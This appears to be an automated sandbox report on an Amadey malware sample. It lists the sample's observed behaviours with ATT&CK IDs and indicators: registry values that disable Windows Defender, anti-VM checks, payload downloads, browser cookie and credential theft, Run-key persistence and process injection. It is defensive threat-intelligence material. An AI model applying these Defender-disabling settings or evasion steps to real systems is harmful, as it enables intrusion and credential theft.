amadey | f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	8f9cdc126e.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3omTNLZ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	kdMujZh.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mcwnj.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f1c548477b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	6610a02fea.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b48baaab9c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3a3b5fb167.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	aa0be991e6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	468c3dbc43.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8f9cdc126e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE

Blocklisted process makes network request 3 IoCs

flow	pid	Process
64	1296	powershell.exe
77	2060	powershell.exe
195	3104	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1296	powershell.exe
2060	powershell.exe
3104	powershell.exe
1416	powershell.exe
2088	powershell.exe
1232	powershell.exe
3652	powershell.exe

Detects GOST tunneling tool 1 IoCs

A simple tunneling tool written in Golang

resource	yara_rule
behavioral1/files/0x0005000000012261-415.dat	Gost

Downloads MZ/PE file 33 IoCs

flow	pid	Process
77	2060	powershell.exe
195	3104	powershell.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
5	2728	skotes.exe
61	2728	skotes.exe
61	2728	skotes.exe
61	2728	skotes.exe
61	2728	skotes.exe
61	2728	skotes.exe
173	4016	BitLockerToGo.exe
276	3816	468c3dbc43.exe
276	3816	468c3dbc43.exe
276	3816	468c3dbc43.exe
276	3816	468c3dbc43.exe
276	3816	468c3dbc43.exe
276	3816	468c3dbc43.exe
64	1296	powershell.exe
79	2804	futors.exe
124	2804	futors.exe

Uses browser remote debugging 2 TTPs 16 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
2912	chrome.exe
876	chrome.exe
1952	chrome.exe
608	chrome.exe
2408	chrome.exe
2828	chrome.exe
2948	chrome.exe
888	chrome.exe
2352	chrome.exe
1748	chrome.exe
288	chrome.exe
2904	chrome.exe
2240	chrome.exe
3828	chrome.exe
3832	chrome.exe
1884	chrome.exe

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	aa0be991e6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	kdMujZh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mcwnj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6610a02fea.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3omTNLZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3omTNLZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b48baaab9c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6610a02fea.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	468c3dbc43.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mcwnj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	kdMujZh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8f9cdc126e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f1c548477b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	468c3dbc43.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8f9cdc126e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	aa0be991e6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f1c548477b.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3a3b5fb167.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3a3b5fb167.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b48baaab9c.exe

Executes dropped EXE 51 IoCs

pid	Process
2728	skotes.exe
1372	7aencsM.exe
1760	7aencsM.exe
2816	3omTNLZ.exe
1728	dzvh4HC.exe
2904	YMci4Rc.exe
2856	YMci4Rc.exe
1604	9aiiMOQ.exe
2232	9aiiMOQ.exe
2608	NL58452.exe
296	NL58452.exe
2356	f3Ypd8O.exe
2548	f3Ypd8O.exe
2536	kdMujZh.exe
2712	amnew.exe
2804	futors.exe
1072	221457afdd.exe
2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
2372	mcwnj.exe
2148	483d2fa8a0d53818306efeb32d3.exe
3048	monthdragon.exe
1984	monthdragon.exe
2532	monthdragon.exe
1812	8f9cdc126e.exe
2560	f1c548477b.exe
2416	3a3b5fb167.exe
2616	6610a02fea.exe
1776	Bjkm5hE.exe
1728	Bjkm5hE.exe
900	NL58452.exe
1888	NL58452.exe
3392	dzvh4HC.exe
3484	b48baaab9c.exe
3796	7aencsM.exe
3832	7aencsM.exe
1216	f3Ypd8O.exe
1732	f3Ypd8O.exe
3772	d2YQIJa.exe
2512	9aiiMOQ.exe
776	9aiiMOQ.exe
1168	9aiiMOQ.exe
696	9aiiMOQ.exe
3676	DTQCxXZ.exe
3484	aa0be991e6.exe
3816	468c3dbc43.exe
3616	service123.exe
960	1c29bfe45e.exe
3904	dc4867a9cf.exe
2352	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE
3152	92c7e4ad44.exe
2636	36f5f1ecb3.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	mcwnj.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	b48baaab9c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	468c3dbc43.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	8f9cdc126e.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	f1c548477b.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	3a3b5fb167.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	kdMujZh.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	6610a02fea.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	3omTNLZ.exe
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine	aa0be991e6.exe

Loads dropped DLL 64 IoCs

pid	Process
2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
2728	skotes.exe
1372	7aencsM.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2756	WerFault.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2904	YMci4Rc.exe
440	WerFault.exe
440	WerFault.exe
440	WerFault.exe
440	WerFault.exe
440	WerFault.exe
2728	skotes.exe
1604	9aiiMOQ.exe
2372	WerFault.exe
2372	WerFault.exe
2372	WerFault.exe
2372	WerFault.exe
2372	WerFault.exe
2728	skotes.exe
2608	NL58452.exe
2068	WerFault.exe
2068	WerFault.exe
2068	WerFault.exe
2068	WerFault.exe
2068	WerFault.exe
2728	skotes.exe
2356	f3Ypd8O.exe
2968	WerFault.exe
2968	WerFault.exe
2968	WerFault.exe
2968	WerFault.exe
2968	WerFault.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2712	amnew.exe
2728	skotes.exe
1296	powershell.exe
1296	powershell.exe
2060	powershell.exe
2060	powershell.exe
2804	futors.exe
2804	futors.exe
3048	monthdragon.exe
3048	monthdragon.exe
2052	WerFault.exe
2052	WerFault.exe
2052	WerFault.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2728	skotes.exe
2804	futors.exe
2804	futors.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\b48baaab9c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009200101\\b48baaab9c.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\aa0be991e6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088725001\\aa0be991e6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\468c3dbc43.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088726001\\468c3dbc43.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\1c29bfe45e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088727001\\1c29bfe45e.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\dc4867a9cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088728001\\dc4867a9cf.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\221457afdd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088694101\\221457afdd.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1088695021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\6610a02fea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10009190101\\6610a02fea.exe"	futors.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000019afd-604.dat	autoit_exe
behavioral1/files/0x000600000001ad83-1727.dat	autoit_exe
behavioral1/files/0x000400000001ced7-1833.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
2788	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
2728	skotes.exe
2816	3omTNLZ.exe
2536	kdMujZh.exe
2564	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
2372	mcwnj.exe
2148	483d2fa8a0d53818306efeb32d3.exe
1812	8f9cdc126e.exe
2560	f1c548477b.exe
2416	3a3b5fb167.exe
2616	6610a02fea.exe
3484	b48baaab9c.exe
3772	d2YQIJa.exe
3484	aa0be991e6.exe
3816	468c3dbc43.exe
2352	TempJHTWT6PLAW2AHPEHC2MQ8SRJUI8S74SX.EXE

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 1372 set thread context of 1760	1372	7aencsM.exe	34
PID 2904 set thread context of 2856	2904	YMci4Rc.exe	55
PID 1604 set thread context of 2232	1604	9aiiMOQ.exe	58
PID 2608 set thread context of 296	2608	NL58452.exe	61
PID 2356 set thread context of 2548	2356	f3Ypd8O.exe	64
PID 3048 set thread context of 2532	3048	monthdragon.exe	98
PID 1776 set thread context of 1728	1776	Bjkm5hE.exe	106
PID 900 set thread context of 1888	900	NL58452.exe	118
PID 3796 set thread context of 3832	3796	7aencsM.exe	130
PID 1216 set thread context of 1732	1216	f3Ypd8O.exe	133
PID 3484 set thread context of 4016	3484	b48baaab9c.exe	145
PID 2512 set thread context of 696	2512	9aiiMOQ.exe	154

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File created	C:\Windows\Tasks\mcwnj.job	kdMujZh.exe
File opened for modification	C:\Windows\Tasks\mcwnj.job	kdMujZh.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

pid	pid_target	Process	procid_target
2756	1372	WerFault.exe	33
440	2904	WerFault.exe	54
2372	1604	WerFault.exe	57
2068	2608	WerFault.exe	60
2968	2356	WerFault.exe	63
2052	3048	WerFault.exe	96
1936	1776	WerFault.exe	105
2240	900	WerFault.exe	117
3904	3796	WerFault.exe	129
1168	1216	WerFault.exe	132
2900	2512	WerFault.exe	149
860	1812	WerFault.exe	100

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3a3b5fb167.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3omTNLZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9aiiMOQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	92c7e4ad44.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36f5f1ecb3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9aiiMOQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	1c29bfe45e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3Ypd8O.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	monthdragon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMci4Rc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	1c29bfe45e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NL58452.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1c29bfe45e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9aiiMOQ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aa0be991e6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YMci4Rc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kdMujZh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8f9cdc126e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f1c548477b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b48baaab9c.exe
